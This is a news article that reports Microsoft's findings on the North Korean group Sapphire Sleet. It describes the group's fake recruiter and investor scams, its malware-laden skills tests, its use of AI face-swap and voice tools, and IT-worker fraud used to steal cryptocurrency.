North Korea’s Sapphire Sleet Steals Over $10M in Cryptocurrency Through Fake Recruiter Scams

The North Korean state-sponsored hacking group Sapphire Sleet has reportedly stolen over $10 million in cryptocurrency through sophisticated social engineering campaigns conducted over six months, according to Microsoft.

Tactics and Techniques

Sapphire Sleet, active since at least 2020 and overlapping with groups like APT38 and BlueNoroff, employs elaborate schemes to target individuals and businesses.

Fake Recruiters and Job Seekers on LinkedIn

The group creates fake LinkedIn profiles, impersonating recruiters and job seekers from prestigious firms like Goldman Sachs. Once they gain trust, victims are lured to skills assessment portals controlled by the attackers.

1. Victims are given login credentials and asked to download code for the test, which secretly installs malware.
2. The malware provides the attackers access to sensitive credentials and cryptocurrency wallets.

Impersonating Venture Capitalists

In another tactic, the group poses as venture capitalists expressing interest in target businesses. Victims are tricked into joining online meetings where "connection issues" prompt them to download malicious scripts.

1. The scripts deploy malware, compromising Windows or macOS devices and enabling data theft.

Leveraging Technology to Deceive

Sapphire Sleet uses advanced AI tools and social engineering techniques to enhance their scams:

1. AI-powered Faceswap: To alter stolen photos for use in professional-looking resumes and profiles.
2. Voice-changing software: To add authenticity to their personas.
3. Organized financial tracking: To monitor illicit earnings from cryptocurrency theft and IT work abroad.

North Korea’s IT Workers: A Triple Threat

Microsoft highlights the involvement of North Korean IT workers abroad who contribute to the regime’s economy by:

1. Earning legitimate income: Through freelance platforms like GitHub and LinkedIn.
2. Abusing access: To steal intellectual property.
3. Facilitating ransomware operations: By using fake personas and bogus portfolios.

These workers use facilitators to create accounts and apply for remote jobs, circumventing restrictions that prevent North Koreans from registering on platforms requiring valid bank accounts and phone numbers.

Broader Implications

Microsoft emphasizes that these scams highlight the growing sophistication of North Korean cyber operations, which are crucial for generating revenue amid international sanctions. The $370,000 earned by IT workers through fraudulent job applications is just one facet of the regime’s broader cyber strategy, which includes cryptocurrency theft, ransomware attacks, and espionage.